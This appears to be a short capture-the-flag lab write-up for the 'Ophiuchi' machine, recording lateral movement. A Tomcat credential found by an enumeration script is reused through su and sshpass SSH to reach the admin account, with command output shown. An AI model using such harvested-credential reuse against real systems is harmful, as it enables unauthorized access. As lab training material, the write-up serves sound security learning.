InfoSec LAB

Ophiuchi_Lateral_Movement

Created: 2 min read

admin

peas extracted a credential used to authenticate to the target tomcat instance; admin:whythereisalimit Coincidently, there is user named, admin, in the system as well. I should test the credential for password reuse

tomcat@ophiuchi:~$ su admin
password: whythereisalimit
 
admin@ophiuchi:/opt/tomcat$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin)

Password reuse confirmed Since there is a SSH server running on the target system, I will connect back to it via SSH

┌──(kali㉿kali)-[~/…/htb/labs/ophiuchi/yaml-payload]
└─$ sshpass -p 'whythereisalimit' ssh admin@$IP
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-51-generic x86_64)
 
 * documentation:  https://help.ubuntu.com
 * management:     https://landscape.canonical.com
 * support:        https://ubuntu.com/advantage
 
  system information as of wed 29 mar 2023 04:20:18 PM UTC
 
  system load:             0.12
  usage of /:              20.0% of 27.43GB
  memory usage:            18%
  swap usage:              0%
  processes:               221
  users logged in:         0
  ipv4 address for ens160: 10.10.10.227
  ipv6 address for ens160: dead:beef::250:56ff:feb9:3d0d
 
 
176 updates can be installed immediately.
56 of these updates are security updates.
to see these additional updates run: apt list --upgradable
 
 
The list of available updates is more than a week old.
to check for new updates run: sudo apt update
 
last login: Mon Jan 11 08:23:12 2021 from 10.10.14.2
admin@ophiuchi:~$ whoami
admin
admin@ophiuchi:~$ hostname
ophiuchi
admin@ophiuchi:~$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.227  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:feb9:3d0d  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:3d0d  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:3d:0d  txqueuelen 1000  (Ethernet)
        RX packets 14418  bytes 5007345 (5.0 MB)
        RX errors 0  dropped 110  overruns 0  frame 0
        TX packets 4091  bytes 2008300 (2.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 49042  bytes 3493930 (3.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 49042  bytes 3493930 (3.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Lateral movement made to the admin user via SSH

Interactive Graph View

Backlinks